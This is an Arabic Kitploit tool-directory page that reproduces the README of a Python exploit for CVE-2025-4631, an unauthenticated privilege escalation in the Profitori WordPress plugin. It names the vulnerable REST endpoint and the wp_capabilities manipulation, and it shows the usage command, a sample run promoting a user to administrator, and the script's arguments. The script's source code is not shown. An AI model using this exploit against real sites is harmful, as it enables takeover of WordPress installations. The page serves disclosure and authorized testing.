Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-4631 — Profitori 2.0.6.0 - 2.1.1.3 - غياب التفويض المؤدي إلى تصعيد الامتيازات دون مصادقة | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-4631
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-4631

CVE-2025-4631

Profitori 2.0.6.0 - 2.1.1.3 - غياب التفويض المؤدي إلى تصعيد الامتيازات دون مصادقة

عرض المستودع
111منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 CVE-2025-4631 - استغلال تصعيد الصلاحيات في إضافة Profitori لووردبريس

📌 ملخص الثغرة

إضافة Profitori (الإصدارات من 2.0.6.0 إلى 2.1.1.3) معرّضة لـ تصعيد صلاحيات غير مصادَق عليه بسبب غياب فحص الصلاحيات في نقطة النهاية /wp-json/stocktend/v1/stocktend_object. وهذا يسمح للمهاجمين عن بُعد بتصعيد صلاحيات المستخدمين الحاليين (أو إنشاء مستخدمين جدد) من خلال التلاعب المباشر بحقل wp_capabilities الوصفي.

  • CVE: CVE-2025-4631
  • درجة CVSS: 9.8 (حرجة)
  • تاريخ النشر: 30 مايو 2025
  • آخر تحديث: 31 مايو 2025

🛠️ ماذا يفعل هذا السكربت

تقوم أداة الاستغلال هذه المكتوبة بلغة Python بأتمتة عملية تصعيد الصلاحيات من خلال:

  1. ✅ التحقق من إصدار الإضافة عبر ملف readme.txt.
  2. 🚀 استغلال نقطة نهاية REST API المعرّضة إذا تم اكتشاف إصدار قابل للاستغلال.
  3. 📡 إرسال الحمولة لتصعيد صلاحيات مستخدم إلى مسؤول (Administrator).
  4. 🧾 طباعة نتائج مفصّلة ومنسّقة تتضمن بيانات اعتماد المستخدم المعدّل.

إذا فشل فحص الإصدار، تستمر أداة الاستغلال بحذر مع إصدار تحذير.


📸 إثبات الاستغلال

Proof of Concept


💻 الاستخدام

root@kitploit:~
usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]

مثال:

root@kitploit:~
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3

مخرجات نموذجية:

root@kitploit:~
[📄] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Vulnerable version detected: 2.1.1.3
[🚀] Exploiting in 3 seconds...
[📡] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit completed successfully!

[🧾] Updated User Information:
--------------------------------------
🆔 User ID         : 3
👤 Username        : subscriber
📧 Email           : [email protected]
🪪 Display Name    : Subscriber User
🔗 User URL        : 
🛡 Role Raw        : a:1:{s:13:"administrator";b:1;}

[👑] Exploit By : Nxploited (Khaled_alenazi)
🔗 GitHub       : https://github.com/Nxploited
📧 Email        : [email protected]

⚙️ وسائط السكربت


📂 المتطلبات

  • Python 3.x
  • مكتبة requests

التثبيت عبر:

root@kitploit:~
pip install requests

⚠️ إخلاء مسؤولية

هذه الأداة مقدمة لأغراض تعليمية واختبارات مصرّح بها فقط. أي إساءة استخدام لهذا الاستغلال ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها ممنوعة منعًا باتًا. المُنشئ غير مسؤول عن أي أضرار أو عواقب قانونية ناتجة عن الاستخدام غير السليم.


بواسطة: Nxploited ( Khaled_Alenazi )

تنزيل الأداة
Flagالوصفمطلوب
-u, --url🌐 الرابط الأساسي لموقع ووردبريس✅ نعم
-id🆔 معرف المستخدم المراد تصعيد صلاحياته✅ نعم
--email📧 بريد إلكتروني وهمي للعرض❌ لا
--name👤 الاسم المعروض❌ لا
--url_field🔗 حقل رابط المستخدم❌ لا
--verbose🔍 طباعة استجابة JSON الكاملة❌ لا